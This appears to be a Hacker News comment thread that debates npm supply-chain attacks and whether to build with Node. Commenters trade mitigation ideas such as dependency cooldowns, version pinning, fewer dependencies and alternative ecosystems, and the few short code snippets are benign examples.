Of course using more JSR packages does start to add more reason to prefer Deno to Node. Also, there are still some packages that are deno.land/x/ only (sort of the first version of JSR, but no npm cross-compatibility) worth checking out. For instance, I've been impressed with Lume [1], a thoughtful SSG that's sort of the opposite of Astro in that it iterates at a slow, measured pace, and doesn't try to be a kitchen sink but more of workbench with a lot of tools easy to find. It's deno.land/x/ only for now for reasons I don't entirely agree with but I can't deny that JSR can be quite a step up in publishing complexity for not exactly obvious gain.
[0] https://jsr.io/
[1] https://lume.land/
Node is fine, the issue lies in its package model and culture:
* Many dependencies, so many that you don't know (and stop caring) what is being used.
* Automatic and regular updates, new patch versions for minor changes, and a generally accepted best practice of staying up to date on the latest versions of things, due to trauma from old security breaches or big migrations after not updating for a while.
* No review; trust-based self-publishing of packages and instant availability
* Opaque pre/postinstall scripts
The fix is both cultural and technological:
* Stop releasing for every fart; once a week is enough, the only exception being critical security fixes.
* Stop updating immediately whenever there's an update; once a week is enough.
* Review your updates
* Pay for a package repository that actually reviews changes before making them widely available. Actually, I think the organization behind npm should set that up; there are trillion-dollar companies using the Node ecosystem who would be willing and able to pay for some security guarantees.
Microsoft owns npmjs.com. They could pay for AI analysis of published version deltas, looking for backdoors and malware.
I’m not a node/js apologist, but every time there is a vulnerability in an npm package, this opinion is voiced.
But in reality it has nothing to do with node/js. It’s just because it’s the most used ecosystem. So I really don’t understand the argument of not using node. Just be mindful of your dependencies and avoid updating every day.
It has everything to do with node/js. Because the community believes in tiny dependencies that must be updated as often as possible and the tooling reflects that belief.
it's interesting that staying up to date with your dependencies is considered a vulnerability in Node
Having a cooldown is different from never updating. I don’t think waiting a few days is a bad security practice in any environment, node or otherwise.
1 reply →
People who live on the edge of updates always risk vulnerabilities and incompatibility issues. It’s not about node, but anything software related.
We chose to write our platform for product security analytics (1) with PHP, primarily because it still allows us to create a platform without bringing in over 100 dependencies just to render one page.
I know this is a controversial approach, but it still works well in our case.
"require": { "php": ">=8.0",
1. https://github.com/tirrenotechnologies/tirreno
Not sure what the language has to do with it; we built JavaScript applications without pulling in 100s of npm packages before npm was a thing, and people and organizations can still do so today, without having to switch language, if they don't want to.
Does it require discipline and a project not run by developers who just learned to program? You betcha.
I might say that every interpreter has a different minimum dependency level just to create a simple application. If we're talking about Node.js, there's a long list of dependencies by default.
So yes, in comparison, modern vanilla PHP with some level of developer discipline (as you mentioned) is actually quite suitable, though unfortunately not popular, for low-dependency development of web applications.
4 replies →
Ah yes PHP, the language known for its strong security...
Oh yes, let's remember PHP 4.3 and all the nostalgic baggage from that era.
Modern PHP is leagues above Javascript
3 replies →
Just keep the number of packages you use to a minimum. If some package itself has like 200 deps, uninstall it and look for an alternative with fewer deps, or think about whether you really need said package.
I also switched to Phoenix, using JS only when absolutely necessary. I would do the same with Laravel at work if switching to SSR were feasible...
I do not trust the whole js ecosystem anymore.
Did Phoenix not require npm at some point or is that not true?
At the beginning, but not anymore. You still have the option to pull in libraries and packages, but it's not really required by default.
1 reply →
Node doesn't have any particular relation to NPM? You don't have to download 1000 other people's code. Writing your own code is a thing that you are legally allowed to do, even if you're writing in Javascript.
Yes, and you can code in assembly as well if you want. But that's not how 99% of the people using Node use it, so while it's theoretically possible to code up every last bit yourself, that doesn't contribute to the discussion at all.
An ecosystem, if it insists on slapping on a package manager (see also: Rust, Go), should always properly evaluate the resulting risks and put proper safeguards in place, or you're going to end up with a massive supply-chain headache.
Writing code yourself so as not to cultivate 1000 dependencies you can't possibly ensure the security of is not the same as writing assembly. That you even reach for that comparison is indicative of the deep rot in Javascript culture. Writing your own code is perceived as a completely unreasonable thing to be doing by 99% of JS devs, and that's why the web performs like trash and has breaches every other day; but it's actually a very reasonable thing to be doing, and people who write most any other language typically engage in writing their own code on a daily basis. At any rate, JS the language itself is fine, Node is fine, and it is possible to adopt better practices without forsaking the language/ecosystem completely.
8 replies →
So you're supposed to write your own PostHog? Be serious.
I tell people this over and over and over: every time you use a third-party dependency, especially an ongoing one, you should consider that you are adding its developers to your team and importing their prior decisions and their biases. You add them to your circle of trust.
You can't just scale out a team without assessing who you are adding to it: what is their reputation? where did they learn?
It's not quite the same questions when picking a library but it is the same process. Who wrote it? What else did they write? Does the code look like we could manage it if the developer quits, etc.
Nobody's saying you shouldn't use third-party dependencies. But nobody benefits if we pretend that adding a dependency isn't a lot like adding a person.
So yeah, if you need all of posthog without adding posthog's team to yours, you're going to have to write it yourself.
1 reply →
Yes. If your shop is serious about security, it is in no way unreasonable to be building out tools like that in-house, or else paying a real vendor with real security practices for their product. If you're an independent developer, the entirety of Posthog is overkill, and you can instead write the specific features you need yourself.
1 reply →
If they have an HTTP API using standard authentication methods, it's not that difficult to create a simple wrapper. Granted, it's a bit more work if you want to do things like input/output validation too, but there's a trade-off between ownership there and avoiding these kinds of supply-chain attacks.
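A minimal sketch, assuming a hypothetical vendor endpoint and bearer auth:

    // call the vendor's HTTP API directly instead of installing
    // their SDK and its whole dependency tree
    async function capture(event, properties) {
      const res = await fetch("https://api.vendor.example/v1/events", {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
          "Authorization": `Bearer ${process.env.VENDOR_API_KEY}`,
        },
        body: JSON.stringify({ event, properties }),
      });
      if (!res.ok) throw new Error(`capture failed: ${res.status}`);
    }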
4 replies →
npm has been the official package manager for node since forever (0.8 or earlier iirc). I think even before the io.js fork and merge.
Professionally I am a full-time FE dev using TypeScript+React. The backends for my side projects are all done in C#, even though I'd be fluent in Node+TypeScript, for that very reason. In a current side project, my backend has only 3 external package dependencies, 2 of which are SQLite+ORM related. The frontend for that side project has over 50 (React/TypeScript/MaterialUI/NextJS/NX etc.).
.NET being so batteries-included is one of its best features. And when vulnerabilities do creep in, it's nice to know that Microsoft will fix it rather than hoping a random open source project will.
There are only two kinds of technologies:
the ones that most people use and some people complain about, and the ones that nobody uses and people keep advocating for.
This is a common refrain on HN, frequently used to dismiss what may be perfectly legitimate concerns.
It also ignores the central question of whether NPM is more vulnerable to these attacks than other package managers, and should therefore be considered an unreasonable security risk.
It's not just npm, you should also not trust pypi, rubygems, cargo and all the other programming language package managers.
They are built for programmers, not users. They are designed to allow any random untrusted person to push packages with no oversight whatsoever. You just make an account and push stuff. I have no doubt you can even buy accounts if you're malicious enough.
Users are much better served by the Linux distribution model which has proper maintainers. They take responsibility for the packages they maintain. They go so far as to meet each other in person so they can establish decentralized root of trust via PGP.
Working with the distributions is hard though. Forming relationships with people. Participating in a community. Establishing trust. Working together. Following packaging rules. Integrating with a greater dynamic ecosystem instead of shipping everything as a bloated container whose only purpose is to statically link dynamic libraries. Developers don't want to do any of that.
Too bad. They should have to. Because the npm clusterfuck is what you get when you start using software shipped by totally untrusted randoms nobody cares to know about much less verify.
Using npm is equivalent to installing stuff from the Arch User Repository while deliberately ignoring all the warnings. Malware's been found there as well, to the surprise of absolutely no one.
There are far too many languages and many packages for each of them for this (good) idea to be practicable.
You can go very far with just Node alone (it accepts TypeScript without tsc, has a testing framework, ...). Include the pg library, which has no dependencies. Build a thin layer above Node and you can have a pretty stable setup. I got burnt so many times that I think it is simply impossible to build something that won't break within 3 months if you start including batteries.
When it comes to frontend, well I don't have answers yet.
You can write a simple front-end without reactive components. Most pages are not full-blown apps, and they were fine for a very long time with jQuery, whose features have been largely absorbed into plain JS/DOM/CSS.
> Serious question: should someone develop new technologies using Node any more?
I think we have given the TypeScript/JavaScript communities enough time. These sorts of problems will continue to happen regardless of the runtime.
Adding one more library increases the risk of a supply-chain attack like this.
As long as you're using npm or any npm-compatible runtime, it remains an unsolved, recurring issue in the npm ecosystem.
> Serious question: should someone develop new technologies using Node any more?
Serious answer: no.
I think I'm going to just use a static site generator, maybe add some WASM modules built with a language that has a sane package manager and enjoy my life instead of getting involved with this cluster of a show.
Node itself is still fine, and you can do a lot these days without needing tons of libraries. No need for axios when we have fetch, and there's a built-in test runner and assertion library.
There are some things that kind of suck (working with time - will be fixed by the Temporal API eventually), but you can get a lot done without needing lots of dependencies.
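For example, a test with nothing but built-ins (Node 18+):

    // run with: node --test
    import { test } from "node:test";
    import assert from "node:assert/strict";

    test("fetch is available without any dependency", () => {
      assert.equal(typeof fetch, "function");
    });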
Hell no.
You need standalone dependencies, like Tailwind offers with its standalone CLI. Predators go where their prey is. npm is a monoculture. It's like running Windows in the 90's; you're just asking for viruses. But 90% of frontend teams will still use npm because they can't figure anything else out.
Building websites =/= Developing new technologies.
Yup! No new technologies have been invented or discovered thru building websites since CSS 1.0 in 1996.
Even worse! We lost <FRAME> along the way.
Just lock your packages to patch versions, make sure to use versions that are at least a week old.
And maybe don't update your dependencies very often.
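In npm terms, I believe that amounts to something like:

    # .npmrc: record exact versions instead of ^ranges when adding deps
    save-exact=true

And use `npm ci` in CI so only what's in the lockfile ever gets installed.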
If I had to bet, the most likely and pragmatic solution will be to have dependency cooldowns, and that's it.
If everyone does it, then it becomes less effective, because there'd be fewer early testers to experience and report issues, no?
Yes, it's gonna be heuristics all the way down. This problem isn't solved formally, but the ecosystem(s) having these issues are too big to be discarded "just" because of that.
Node and npm are not the same things. I'm not even a developer. You're seriously a developer?
If you're looking for practical recommendations how to work with npm maintaining reasonable safety expectations, my post here mostly covers it: https://worklifenotes.com/2025/09/24/npm-has-become-a-russia...
npm has been a shit show from day 1. Unfortunately, industry momentum and VC-funded "fail fast, fail often" is a hell of a drug.
EDIT: Coffee hasn't kicked in yet; that was harsher than I intended. For what it's worth, it's not specifically/solely npm/Node's fault - more a convergence of the above and the ecosystem/users, just as much as any of the Node/npm devs/maintainers, combined with it having such a large attack cross-section. Even if it had a reputation for being bulletproof and secure as fuck, there's still such a large userbase with huge potential if exploited that it'd almost assuredly be compromised from time to time regardless.
While I feel we could use a whole lot less JavaScript on the web (client and server side both), without a competitor or something, its sheer size ensures any such exploit/issue gets amplified 1000x versus nearly any other project, save for maybe major OSes and browsers themselves.
You have this issue with ALL external code though. npm/Node and JavaScript overall may exacerbate the problem, but you have it with any other remote repository too - often without even noticing it unless you pay close attention; see the xz-utils backdoor: it took a while before someone noticed the sneaky payload. So I don't think this works as a selective filter against using Node, if you have a use case for it.
Take Ruby - even before a certain corporation effectively took over Ruby Central and rubygems.org, almost two years ago they added a 100,000 download limit. That is, after that threshold was passed, the original author was deprived of the ability to remove the project again - unless the author resigns from rubygems.org. Which I promptly did. I could not accept any corporation trying to force me into maintaining old projects (I tend to remove old projects quickly; the licence allows people to fork them, so they can maintain them if they want to, but my name cannot be associated with outdated projects I already abandoned once newer releases are available. The new corporate overlords running rubygems.org, who keep on lying about how "they serve the community", refused to accept this explanation, so my time came to a natural end at rubygems.org. Of course this year it would be even easier, since they changed the rules to satisfy their new corporate overlords anyway: https://blog.rubygems.org/2025/07/08/policies-live.html)
You forget to account for the fact that the xz-utils backdoor was extremely high effort. Literally a highly skilled person building trust over time. While it's obviously possible and problematic, it's still a scaling/time issue.
Serious answer: no.
Couldn't similar issues happen with Rust, Python, Dart, C#, Java, Ruby? Supply chain attacks are not unique to Node / NPM.
I'm sure the list of available attacks are somewhat different, but you can get pwned in all of these ecosystems.
> Serious question: should someone develop new technologies using Node any more?
Please, no.
It is an absolutely terrible ecosystem. The layer cake of dependencies is just insane.
Node the technology can be used without blindly relying on the update features of npm. Vet your dependency trees, lock your dependency versions at patch level and use dependency cooldown.
This is something you also need to do with package managers in other languages, mind you.
If everybody in your country drives on the right side of the road you could theoretically drive on the left. But you won't get very far like that.
People use Node because of the availability of the packages, not the other way around.
13 replies →
The affected packages are all under namespaces pretty much nobody uses, or they are subdependencies of junk libraries nobody should be using if they're serious about writing production code.
I'm getting tired of the anti-Node.js narrative that keeps going around as if other package repos aren't the same or worse.
You need to explain how one is supposed to distinguish and exclude "namespaces pretty much nobody uses" when writing code in this ecosystem. My understanding is that a typical Node developer pretty much has no control over what gets pulled in if they want to get anything done at all. If that's the case, then you don't have an argument. If a developer genuinely has no control, then the point is moot.
How is this situation any different from any other ecosystem? I think you don't have an argument here other than that npm is a relatively large public repository. Bad actors and ignorant developers are everywhere else too.
There are plenty of npm features to help assess packages and prevent unintended updates, but nothing replaces due diligence.
1 reply →
The only way a worm like this spreads is usage of the affected packages. The proliferation itself is clear evidence of use.
Ok, I'll bite; which package repos are "the same or worse" than those of nodejs?
All of them. The issue at hand is not limited to a specific language or tool or ecosystem, rather it is fundamental to using a package manager to install and update 3rd party libraries.
I see a bunch under major SaaS vendor namespaces that have millions of weekly downloads…?
Popular junk is still junk